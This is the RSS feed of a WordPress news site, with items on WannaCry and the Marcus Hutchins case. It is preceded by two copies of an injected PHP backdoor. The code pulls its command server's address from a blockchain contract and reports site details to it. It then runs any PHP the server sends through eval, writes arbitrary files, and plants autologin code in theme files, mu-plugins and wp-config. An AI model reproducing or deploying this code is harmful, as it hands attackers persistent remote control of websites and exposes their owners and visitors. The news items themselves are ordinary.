// q2_xh if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php', 'ctrl'=>'// q2_xh', 'vis'=>'// xp_v9', 'vis_func'=>'wp_dia8xd', 'vis_paths'=>array('/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php'), 'opt'=>'_wp_47nl0jvi', ); $keys=array(); $keys['id']='kun'; $keys['ver']='em'; $keys['caps']='eby'; $keys['tasks']='awd'; $keys['interval']='pww'; $keys['ack_id']='nl0'; $keys['ok']='9s'; $keys['detail']='wyy'; $keys['inv']='kxw'; $keys['result']='f3t'; $hdr='X-J98-Auth';$tok='0cQMbCeRLTCSW0NdninnOEVrAtwy11ErS16wrKLqeas';$id='1d0c923bac57072b';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); // l0_9z if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php', 'ctrl'=>'// l0_9z', 'vis'=>'// zn_yn', 'vis_func'=>'wp_cuzg8t', 'vis_paths'=>array('/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php'), 'opt'=>'_wp_mtrhds4x', ); $keys=array(); $keys['id']='ybc'; $keys['ver']='a1'; $keys['caps']='afo'; $keys['tasks']='x9t'; $keys['interval']='2e4'; $keys['ack_id']='k72'; $keys['ok']='ch'; $keys['detail']='xd9'; $keys['inv']='hw8'; $keys['result']='0bb'; $hdr='X-L8A-Auth';$tok='A3-EVnA_qOJ132k0gQIT_73RgM-QQ5Szxw145ZNDetU';$id='d1451f9eb0097c9f';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); WannaCry – Brief News https://briefnews.eu Latest World News. Find every day short and brief information composed of titles and subtitles and continue reading if interested. Thu, 06 Sep 2018 19:17:44 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.6 https://briefnews.eu/wp-content/uploads/2018/01/cropped-logoSmall-1-32x32.png WannaCry – Brief News https://briefnews.eu 32 32 DoJ Charges North Korean Hacker for Sony, WannaCry, and More https://briefnews.eu/doj-charges-north-korean-hacker-for-sony-wannacry-and-more/ https://briefnews.eu/doj-charges-north-korean-hacker-for-sony-wannacry-and-more/#respond Thu, 06 Sep 2018 19:17:44 +0000 http://briefnews.eu/doj-charges-north-korean-hacker-for-sony-wannacry-and-more/ The Department of Justice has taken its first legal action against North Korea’s cybercrimes, in a massive complaint made public Thursday.


https://media.wired.com/photos/5b914dd531da9d2dd4095014/master/pass/nkhackers_191781385926.jpg

]]>
https://briefnews.eu/doj-charges-north-korean-hacker-for-sony-wannacry-and-more/feed/ 0
The FCC’s Fake DDoS Attack, WannaCry Hits an Apple Supplier, and More Security News This Week https://briefnews.eu/the-fccs-fake-ddos-attack-wannacry-hits-an-apple-supplier-and-more-security-news-this-week/ https://briefnews.eu/the-fccs-fake-ddos-attack-wannacry-hits-an-apple-supplier-and-more-security-news-this-week/#respond Sun, 12 Aug 2018 05:39:53 +0000 http://briefnews.eu/the-fccs-fake-ddos-attack-wannacry-hits-an-apple-supplier-and-more-security-news-this-week/ The PGA Tour gets hit with ransomware, Wikileaks says the US Senate wants a word, and more.


https://media.wired.com/photos/5b6dddfbfb5fd052de317492/master/pass/AjitPai.jpg

]]>
https://briefnews.eu/the-fccs-fake-ddos-attack-wannacry-hits-an-apple-supplier-and-more-security-news-this-week/feed/ 0
WannaCry Hero Marcus Hutchins’ New Legal Woes Spell Trouble for White Hat Hackers https://briefnews.eu/wannacry-hero-marcus-hutchins-new-legal-woes-spell-trouble-for-white-hat-hackers/ https://briefnews.eu/wannacry-hero-marcus-hutchins-new-legal-woes-spell-trouble-for-white-hat-hackers/#respond Fri, 08 Jun 2018 20:22:03 +0000 http://briefnews.eu/wannacry-hero-marcus-hutchins-new-legal-woes-spell-trouble-for-white-hat-hackers/ By expanding the case against Marcus Hutchins, the Department of Justice has signaled a troubling interpretation of cybersecurity law.


https://media.wired.com/photos/5b19bde5ed19ac11dee5d2a2/master/pass/Marcus-Hutchins_809550676-w.jpg

]]>
https://briefnews.eu/wannacry-hero-marcus-hutchins-new-legal-woes-spell-trouble-for-white-hat-hackers/feed/ 0
'Hero' hacker who shut down WannaCry faces 4 more charges, including lying to FBI https://briefnews.eu/hero-hacker-who-shut-down-wannacry-faces-4-more-charges-including-lying-to-fbi/ https://briefnews.eu/hero-hacker-who-shut-down-wannacry-faces-4-more-charges-including-lying-to-fbi/#respond Thu, 07 Jun 2018 06:39:21 +0000 http://briefnews.eu/hero-hacker-who-shut-down-wannacry-faces-4-more-charges-including-lying-to-fbi/ Marcus Hutchins, the hacker who stopped the WannaCry ransomware and was arrested by the FBI soon after, accused of creating and distributing malware himself, has asked for donations to cover legal costs as he faces more charges.

The updated indictment was filed with the Wisconsin Eastern District Court earlier this week. It complements the original six-count indictment against Hutchins from July, submitted a month before his arrest by FBI agents in Las Vegas, Nevada, with four more charges.

Hutchins, who has been released on bail pending trial, had already been charged with advertising, distributing and profiting from a malware code called “Kronos” between July 2014 and July 2015. In addition to these charges, the updated indictment accuses the hacker-turned-cyber-security-expert of lying to the FBI during the arrest about his role in developing the virus.

Hutchins “knowingly and willfully made a materially false, fictitious, and fraudulent statement” by claiming that he was not aware his computer code was part of Kronos malware “until he reverse engineered the malware sometime in 2016,” the indictment states. The investigators say that Hutchins, in fact, helped develop the malware, admitting to his acquaintance as far back as in November 2014, that he laid his hand on the virus.

Read more


Marcus Hutchins (R) at US Federal Courthouse on August 14, 2017 in Milwaukee, Wisconsin. © Joshua Lott

Hutchins’ defense has long been fighting for the court to withhold from his case the statements the British hacker made to the agents during his arrest, arguing that he was deceived into confessing and was not properly explained his rights before the interrogation. They argued that due to the differences in UK and US law, Hutchins might have wrongly believed that his silence could have been used against him. Besides that, he was “exhausted and intoxicated at the time,” which was well known to the FBI, his lawyers say.

Apart from attempting to make ill gains from Kronos, the new indictment, released on June 5, accuses Hutchins of being behind another malware virus, known as UPAS Kit. The superseding indictment says that the defendant marketed the malware, saying it was made “to install silently and not alert antivirus engines” while stealing personal data from a PC.

Two other charges relate to him “aiding and abetting” the spread of a malignant code in an attempt to damage “10 or more protected computers,” as well as helping others to hack PCs for financial gain.

As the news on the new indictment broke, Hutchins, also known as MalwareTech, appealed to his Twitter followers to fund his mounting legal expenses.

“Spend months and $ 100k+ fighting this case, then they go and reset the clock by adding even more bullshit charges like ‘lying to the FBI,’” he wrote. He then called for donations with a quote from the strategy video game Starcraft: “We require more minerals.”

He lashed out at the investigators in another tweet peppered with expletives, which he, however, promptly deleted.

Hutchins was hailed as a hero after he stopped the WannaCry attack that crippled computers worldwide in May last year after, but he fell from grace just several months later and currently awaits trial, which is yet to be scheduled. Hutchins has pleaded not guilty to all the charges

Let’s block ads! (Why?)

]]>
https://briefnews.eu/hero-hacker-who-shut-down-wannacry-faces-4-more-charges-including-lying-to-fbi/feed/ 0
Hacker who stopped WannaCry, indicted for malware, gave a forced confession – defense team https://briefnews.eu/hacker-who-stopped-wannacry-indicted-for-malware-gave-a-forced-confession-defense-team/ https://briefnews.eu/hacker-who-stopped-wannacry-indicted-for-malware-gave-a-forced-confession-defense-team/#respond Mon, 08 Jan 2018 04:16:56 +0000 http://briefnews.eu/hacker-who-stopped-wannacry-indicted-for-malware-gave-a-forced-confession-defense-team/

Lawyers for a hacker who stopped the WannaCry ransomware that paralyzed computers around the world and almost brought the NHS to its knees, says he was coerced into confessing to spreading malware, being tired and intoxicated.

Marcus Hutchins, 23, was arrested in Las Vegas airport after attending the annual Def Con hacking convention and later indicted for advertising, distributing and profiting from a malware code called “Kronos” between July 2014 and July 2015. Kronos is downloaded via email attachments and exposes banking and credit card credentials.

Hutchins, AKA ‘MalwareTech,’ the British hacker who currently resides in Los Angeles after posting $ 10,000 bail, denies all six counts of creating and distributing the banking trojan.

In court documents filed Friday, his defense team alleges he had been subjected to prior surveillance before his arrest and therefore, arresting officers would have known that he was “exhausted and intoxicated at the time.”

Read more

© Ben Birchall

“The defense intends to argue that the government coerced Mr Hutchins, who was sleep-deprived and intoxicated to talk,” they added. “As such, his decision to speak with the agents was not knowing, intelligent, and made in full awareness of the nature of the right given up and the consequences of giving up that right, as the law requires.”

The team also argued that he may not have been read his Miranda rights and that he may have wrongly believed his silence may have been used to prosecute him, as under UK law there is no right counsel like there is in the US. The interrogating officers allegedly failed to record audio of Hutchins being read his Miranda rights, despite recording the majority of the interview. The defense also filed a motion to compel authorities to turn over five previously withheld pieces of evidence from the discovery section of the case.

The US government does not deny conducting surveillance on Hutchins prior to his arrest, but will not furnish the defense team with any information from said surveillance operations.

“The defense believes the requested discovery will show the government was aware of Mr. Hutchins’ activities while he was in Las Vegas, including the fact that he had been up very late the night before his arrest, and the high likelihood that the government knew he was exhausted and intoxicated at the time of his arrest.”

The motion also requested additional information on Hutchins’ unnamed co-defendant who has yet to be apprehended. Known only as ‘Randy.’ The defense has only received heavily redacted transcripts of Randy’s interview with the FBI reports CSO Online.

There may also be grounds for the defense team to dismiss a minimum of two of the charges levelled against Hutchins if they can prove that the legal instructions given to the grand jury were incorrect or that the indictment was misstated.

RT.com has reached out to Hutchins for comment.

A trial date has not yet been set.

Let’s block ads! (Why?)

RT – Daily news

]]>
https://briefnews.eu/hacker-who-stopped-wannacry-indicted-for-malware-gave-a-forced-confession-defense-team/feed/ 0
‘Show us the evidence’: N. Korea invites US to prove Pyongyang’s WannaCry connection https://briefnews.eu/show-us-the-evidence-n-korea-invites-us-to-prove-pyongyangs-wannacry-connection/ https://briefnews.eu/show-us-the-evidence-n-korea-invites-us-to-prove-pyongyangs-wannacry-connection/#respond Tue, 26 Dec 2017 07:55:04 +0000 http://briefnews.eu/show-us-the-evidence-n-korea-invites-us-to-prove-pyongyangs-wannacry-connection/

North Korea has demanded the US provide evidence to support its claims that the WannaCry ransomware attack was engineered by Pyongyang. The attack crippled 200,000 computers in 150 countries earlier in 2017.

Washington’s allegations are merely a “baseless provocation” used to generate tensions between the countries, Pak Song Il, the North Korean ambassador for American affairs at the UN, told AP.

Read more

© Monika Skolimowska / Global Look Press

Pyongyang considers these claims an attempt to create an “extremely confrontational atmosphere,” the North’s top official stated. “If they are so sure, show us the evidence,” the envoy added.

Earlier in December, White House Homeland Security advisor Tom Bossert wrote an Op-Ed claiming that the US has proof that it was North Korea behind the WannaCry cyber-attack, citing a “careful investigation.” Bossert named Pyongyang as the culprit in the attack, although no particular organization or person affiliated with the North Korean government was specifically named.

In May 2017, the global WannaCry cyber-attack targeted computers worldwide. During the attack, personal data was stolen from private users and ransom payment was requested in the form of bitcoin.

